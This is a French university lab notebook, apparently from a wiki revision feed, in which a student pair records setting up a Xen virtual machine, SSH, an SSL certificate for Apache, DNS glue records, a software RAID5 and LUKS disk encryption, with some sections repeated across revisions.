===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
 &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
 -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
   &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
 Listen 80&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
	 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    4) mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
arrêtez la machine virtuelle, retirez lui une des trois partitions, relancez la. Essayez de remonter votre RAID5, que constatez-vous ? &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    5) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    6) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
 On copie des données sur le RAID5.&lt;br /&gt;
&lt;br /&gt;
    7) root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
 mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
 vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose crypt_sd&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46201</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46201"/>
				<updated>2017-11-13T10:45:18Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Certification SSL */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
